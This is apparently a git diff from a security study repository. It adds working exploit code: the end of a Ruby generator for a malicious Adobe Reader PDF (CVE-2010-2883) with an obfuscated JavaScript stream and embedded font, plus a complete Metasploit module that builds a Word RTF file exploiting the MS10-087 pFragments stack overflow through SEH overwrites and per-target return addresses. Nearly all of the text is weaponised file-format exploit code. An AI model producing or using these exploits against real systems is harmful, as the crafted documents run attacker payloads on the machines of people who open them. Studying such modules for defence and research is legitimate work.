|
||||
compressed = Zlib::Deflate.deflate(ttf)
|
||||
pdf << io_def(10) << n_obfu("<</Length %s/Filter/FlateDecode/Length1 %s>>" % [compressed.length, ttf.length]) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
# js action
|
||||
xref << pdf.length
|
||||
pdf << io_def(11) << n_obfu("<<")
|
||||
pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12)
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# js stream
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
|
||||
pdf << io_def(12) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
###
|
||||
# The following form related data is required to get icucnv36.dll to load
|
||||
###
|
||||
|
||||
# form object
|
||||
xref << pdf.length
|
||||
pdf << io_def(13)
|
||||
pdf << n_obfu("<</XFA ") << io_ref(14) << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# form stream
|
||||
xfa = <<-EOF
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
|
||||
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
|
||||
<present><pdf><interactive>1</interactive></pdf></present>
|
||||
</config>
|
||||
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
|
||||
<subform name="form1" layout="tb" locale="en_US">
|
||||
<pageSet></pageSet>
|
||||
</subform></template></xdp:xdp>
|
||||
EOF
|
||||
|
||||
xref << pdf.length
|
||||
pdf << io_def(14) << n_obfu("<</Length %s>>" % xfa.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << xfa << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
###
|
||||
# end form stuff for icucnv36.dll
|
||||
###
|
||||
|
||||
|
||||
# trailing stuff
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
pdf << "0 %d" % (xref.length + 1) << eol
|
||||
pdf << "0000000000 65535 f" << eol
|
||||
xref.each do |index|
|
||||
pdf << "%010d 00000 n" % index << eol
|
||||
end
|
||||
|
||||
pdf << "trailer" << eol
|
||||
pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
|
||||
|
||||
pdf << "startxref" << eol
|
||||
pdf << xrefPosition.to_s() << eol
|
||||
|
||||
pdf << "%%EOF" << eol
|
||||
pdf
|
||||
end
|
||||
end
|
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf
Executable file
BIN
src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf
Executable file
Binary file not shown.
@ -0,0 +1,199 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in the handling of the
|
||||
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
||||
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
||||
MS10-087 bulletin are vulnerable.
|
||||
|
||||
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
||||
|
||||
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
||||
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
||||
began using the Word RTF parser, by default, to handle rich-text messages within
|
||||
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
||||
the Microsoft Word engine too, but it was not a default setting.
|
||||
|
||||
It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that
|
||||
Microsoft will confirm or deny this since Office 2000 has reached its support
|
||||
cycle end-of-life.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'wushi of team509', # original discovery
|
||||
'unknown', # exploit found in the wild
|
||||
'jduck', # Metasploit module
|
||||
'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3333' ],
|
||||
[ 'OSVDB', '69085' ],
|
||||
[ 'MSB', 'MS10-087' ],
|
||||
[ 'BID', '44652' ],
|
||||
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 512,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true # no need
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# This automatic target will combine all targets into one file :)
|
||||
[ 'Automatic', { } ],
|
||||
|
||||
# Office v10.6854.6845, winword.exe v10.0.6854.0
|
||||
[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 23532, 45944 ],
|
||||
#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0
|
||||
'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0
|
||||
}
|
||||
],
|
||||
|
||||
# Office v11.8307.8324, winword.exe v11.0.8307.0
|
||||
# Office v11.8328.8221, winword.exe v11.0.8328.0
|
||||
[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 24580, 51156 ],
|
||||
'Ret' => 0x30001bdd # p/p/r in winword.exe
|
||||
}
|
||||
],
|
||||
|
||||
# In order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.
|
||||
|
||||
# Office v12.0.6425.1000, winword.exe v12.0.6425.1000
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',
|
||||
{
|
||||
'Offsets' => [ 5956 ],
|
||||
'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# crash on a deref path to heaven.
|
||||
[ 'Crash Target for Debugging',
|
||||
{
|
||||
'Offsets' => [ 65535 ],
|
||||
'Ret' => 0xdac0ffee
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 09 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),
|
||||
])
|
||||
end
|
||||
|
||||
def add_target(rest, targ)
|
||||
targ['Offsets'].each { |off|
|
||||
seh = generate_seh_record(targ.ret)
|
||||
rest[off, seh.length] = seh
|
||||
distance = off + seh.length
|
||||
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
|
||||
rest[off + seh.length, jmp_back.length] = jmp_back
|
||||
}
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Prepare a sample SEH frame and backward jmp for length calculations
|
||||
seh = generate_seh_record(0xdeadbeef)
|
||||
jmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-0xffff").encode_string
|
||||
|
||||
# RTF property Array parameters
|
||||
el_size = sz_rand()
|
||||
el_count = sz_rand()
|
||||
|
||||
data = ''
|
||||
# These words are presumably incorrectly used
|
||||
# assert(amount1 <= amount2)
|
||||
data << [0x1111].pack('v') * 2
|
||||
data << [0xc8ac].pack('v')
|
||||
|
||||
# Filler
|
||||
if target.name =~ /Debug/i
|
||||
rest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)
|
||||
else
|
||||
len = 51200 + rand(1000)
|
||||
rest = rand_text(len + seh.length + jmp_back.length)
|
||||
rest[0, payload.encoded.length] = payload.encoded
|
||||
end
|
||||
|
||||
# Stick fake SEH frames here and there ;)
|
||||
if target.name == "Automatic"
|
||||
targets.each { |t|
|
||||
next if t.name !~ /Windows/i
|
||||
|
||||
add_target(rest, t)
|
||||
}
|
||||
else
|
||||
add_target(rest, target)
|
||||
end
|
||||
|
||||
# Craft the array for the property value
|
||||
sploit = "%d;%d;" % [el_size, el_count]
|
||||
sploit << data.unpack('H*').first
|
||||
sploit << rest.unpack('H*').first
|
||||
|
||||
# Assemble it all into a nice RTF
|
||||
content = "{\\rtf1"
|
||||
content << "{\\shp" # shape
|
||||
content << "{\\sp" # shape property
|
||||
content << "{\\sn pFragments}" # property name
|
||||
content << "{\\sv #{sploit}}" # property value
|
||||
content << "}"
|
||||
content << "}"
|
||||
content << "}"
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(content)
|
||||
|
||||
end
|
||||
|
||||
def sz_rand
|
||||
bad_sizes = [ 0, 2, 4, 8 ]
|
||||
x = rand(9)
|
||||
while bad_sizes.include? x
|
||||
x = rand(9)
|
||||
end
|
||||
x
|
||||
end
|
||||
end
|
BIN
src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet
Normal file
BIN
src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user